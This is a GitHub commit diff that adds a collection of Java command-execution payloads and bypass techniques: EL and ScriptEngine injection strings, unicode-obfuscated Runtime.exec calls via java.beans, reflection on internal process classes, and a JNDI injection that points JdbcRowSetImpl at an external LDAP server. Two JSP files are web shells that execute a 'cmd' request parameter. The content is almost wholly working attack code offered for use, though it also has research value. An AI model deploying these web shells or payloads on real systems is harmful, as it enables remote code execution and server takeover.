Add files via upload

Firebasky · web-flow · commit 58dfcb94a436 · 2021-08-05T12:30:39.000+08:00
diff --git a/shell/EL/test.java b/shell/EL/test.java
@@ -0,0 +1,24 @@
+package shell.EL;
+
+import javax.el.ELProcessor;
+
+public class test {
+    public static void main(String[] args) throws Exception {
+        String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='calc';java.lang.Runtime.getRuntime().exec(exp);\")";
+
+        String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" +
+                ".newInstance().getEngineByName('nashorn')" +
+                ".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
+
+        ELeval(payload);
+    }
+
+    public static void ELeval(String payload){
+        ELProcessor elProcessor = new ELProcessor();
+        try {
+            elProcessor.eval(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/shell/Expression/test.java b/shell/Expression/test.java
@@ -0,0 +1,15 @@
+package shell.Expression;
+
+import java.beans.Expression;
+
+public class test {
+    public static void main(String[] args) {
+        String payload ="calc";
+        Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload});
+        try {
+            expression.getValue();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/shell/Expression/test.jsp b/shell/Expression/test.jsp
@@ -0,0 +1,6 @@
+<%@ page import="java.beans.Expression"%>
+<%@ page contentType="text/html; charset=UTF-8" language="java" %>
+<%
+    String payload =request.getParameter("cmd");
+    Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload});
+%>
diff --git a/shell/JNDI/test.java b/shell/JNDI/test.java
@@ -0,0 +1,21 @@
+package shell.JNDI;
+
+import com.sun.rowset.JdbcRowSetImpl;
+
+public class test {
+    public static void main(String[] args) {
+        String payload = "ldap://1.116.136.120:8888/test";//可使用LdapBypassJndi工具
+//        String payload = "ldap://127.0.0.1:1399/test";
+        try {
+            Jndieval(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+    public static void Jndieval(String payload) throws Exception{
+//        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");//绕过jdk191+
+        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
+        jdbcRowSet.setDataSourceName(payload);//设置exp，通过getDataSourceName获得
+        jdbcRowSet.setAutoCommit(true);//调用connect()
+    }
+}
diff --git a/shell/JNI/CommandExecution.java b/shell/JNI/CommandExecution.java
@@ -0,0 +1,11 @@
+package shell.JNI;
+
+public class CommandExecution {
+
+//    public static native String exec(String cmd);
+
+    public static void main(String[] args) {
+        System.setProperty("java.library.path","D:/library");
+        System.out.println(System.getProperty("java.library.path"));
+    }
+}
diff --git a/shell/JNI/test.jsp b/shell/JNI/test.jsp
@@ -0,0 +1,13 @@
+<%@ page contentType="text/html; charset=UTF-8" language="java" %>
+<%! class Jni{
+    static {
+        System.loadLibrary("\\\\127.0.0.1\\cmd.dll");
+    }
+    public  native String exec(String cmd);
+}
+%><%
+    String cmd =request.getParameter("cmd");
+    Jni jni = new Jni();
+    String res = jni.exec(cmd);
+    out.println(res);
+%>
diff --git a/shell/Jshell/test.java b/shell/Jshell/test.java
@@ -0,0 +1,15 @@
+//package shell.Jshell;
+//import jdk.jshell.JShell;
+//
+//public class test {
+//    public static void main(String[] args) {
+//        Jshell("calc");
+//    }
+//    public static void Jshell(String cmd){
+//        try {
+//            JShell.builder().build().eval(cmd);
+//        } catch (IllegalStateException e) {
+//            e.printStackTrace();
+//        }
+//    }
+//}
diff --git a/shell/ScriptEngineManager/test.java b/shell/ScriptEngineManager/test.java
@@ -0,0 +1,30 @@
+package shell.ScriptEngineManager;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+
+public class test {
+    public static void main(String[] args) throws Exception{
+        String test = "print('hello word!!');";
+        String payload1 = "java.lang.Runtime.getRuntime().exec('calc');";
+        String payload2 = "var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command(\"calc\"); x.start();};";
+        String payload3 = "var a=exp();function exp(){java.lang./****/Runtime./***/getRuntime().exec(\"calc\")};";
+        String payload4 = "\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065.getRuntime().exec(\"calc\");";
+        String payload5 = "var a= Java.type(\"java.lang\"+\".Runtime\"); var b =a.getRuntime();b.exec(\"calc\");";
+        String payload6 = "load(\"nashorn:mozilla_compat.js\");importPackage(java.lang); var x=Runtime.getRuntime(); x.exec(\"calc\");";
+        //兼容Rhino功能 https://blog.csdn.net/u013292493/article/details/51020057
+        String payload7 = "var a =JavaImporter(java.lang); with(a){ var b=Runtime.getRuntime().exec(\"calc\");}";
+        String payload8 = "var scr = document.createElement(\"script\");scr.src = \"http://127.0.0.1:8082/js.js\";document.body.appendChild(scr);exec();";
+        eval(payload1);
+    }
+    public static void eval(String payload){
+        payload=payload;
+        ScriptEngineManager manager = new ScriptEngineManager(null);
+        ScriptEngine engine = manager.getEngineByName("js");
+        try {
+            engine.eval(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/shell/bypass/test.java b/shell/bypass/test.java
@@ -0,0 +1,34 @@
+package shell.bypass;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+import java.lang.reflect.Method;
+import java.util.Map;
+
+public class test {
+    public static void main(String[] args) {
+        try {
+            bypass(new String[]{"ipconfig"});
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+    public static void bypass(String[] cmd) throws Exception{
+        Map<String,String> envblock=null;
+        String path=null;
+        ProcessBuilder.Redirect[] stdHandles=null;
+        boolean redirectErrorStream=true;
+
+        Class C = Class.forName("java.lang.ProcessImpl");
+        Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
+        start.setAccessible(true);
+        Process e =  (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream);
+
+        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(e.getInputStream()));
+        String line;
+        while ((line=bufferedReader.readLine())!=null){
+            System.out.println(line);
+        }
+        bufferedReader.close();
+    }
+}
diff --git a/shell/bypass/test2.java b/shell/bypass/test2.java
@@ -0,0 +1,16 @@
+package shell.bypass;
+
+import java.beans.Statement;
+
+public class test2 {
+    public static void main(String[] args) {
+        String payload ="calc";
+        Statement statement = new Statement(Runtime.getRuntime(), "\u0065" + "\u0078" + "\u0065" + "\u0063", new Object[]{payload});
+        try {
+            statement.execute();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
+
diff --git a/shell/bypass/test3.java b/shell/bypass/test3.java
@@ -0,0 +1,40 @@
+package shell.bypass;
+
+import javax.el.ELManager;
+import javax.el.ExpressionFactory;
+import javax.el.StandardELContext;
+import javax.el.ValueExpression;
+import java.io.BufferedReader;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+
+public class test3 {
+    public static void main(String[] args) throws Exception {
+        String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='ipconfig';java.lang.Runtime.getRuntime().exec(exp);\")";
+
+        String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" +
+                ".newInstance().getEngineByName('nashorn')" +
+                ".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
+        ELeval(payload);
+    }
+
+    public static void ELeval(String payload) throws Exception{
+        ELManager elManager = new ELManager();
+        StandardELContext elContext = elManager.getELContext();//获得this.context
+        ExpressionFactory expressionFactory = elManager.getExpressionFactory();//然后this.factory=expressionFactory
+        /*
+        private static String bracket(String expression) {
+            return "${" + expression + "}";
+         }
+         */
+        ValueExpression valueExpression = expressionFactory.createValueExpression(elContext, "${" + payload + "}", Object.class);
+        InputStream inputStream = ((Process) valueExpression.getValue(elContext)).getInputStream();
+
+        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
+        String line;
+        while ((line=bufferedReader.readLine())!=null){
+            System.out.println(line);
+        }
+        bufferedReader.close();
+    }
+}
diff --git a/shell/bypass/test4.java b/shell/bypass/test4.java
@@ -0,0 +1,36 @@
+package shell.bypass;
+
+
+import sun.net.www.MimeEntry;
+
+import java.io.InputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.net.URLConnection;
+
+public class test4 {
+    public static void main(String[] args)throws Exception {
+        bypass("notepad");
+    }
+    public static void bypass(String cmd) throws Exception{
+        Class aClass = Class.forName("sun.net.www.MimeEntry");
+        Constructor d = aClass.getDeclaredConstructor(String.class,int.class,String.class,String.class);
+        d.setAccessible(true);
+        MimeEntry obj =(MimeEntry) d.newInstance("Firebasky", 1314, "C:\\windows\\win.ini", "%s");
+
+        URL url = new URL("http://127.0.0.1:8000");
+        URLConnection urlConnection = url.openConnection();
+        InputStream inputStream = urlConnection.getInputStream();
+
+        Class C = Class.forName("sun.net.www.MimeLauncher");
+        Constructor declaredConstructor = C.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class);
+        declaredConstructor.setAccessible(true);;
+        Thread o = (Thread)declaredConstructor.newInstance(obj,urlConnection, inputStream, "", "");
+        Field execPath = C.getDeclaredField("execPath");
+        execPath.setAccessible(true);
+        execPath.set(o,cmd);
+        o.run();
+
+    }
+}
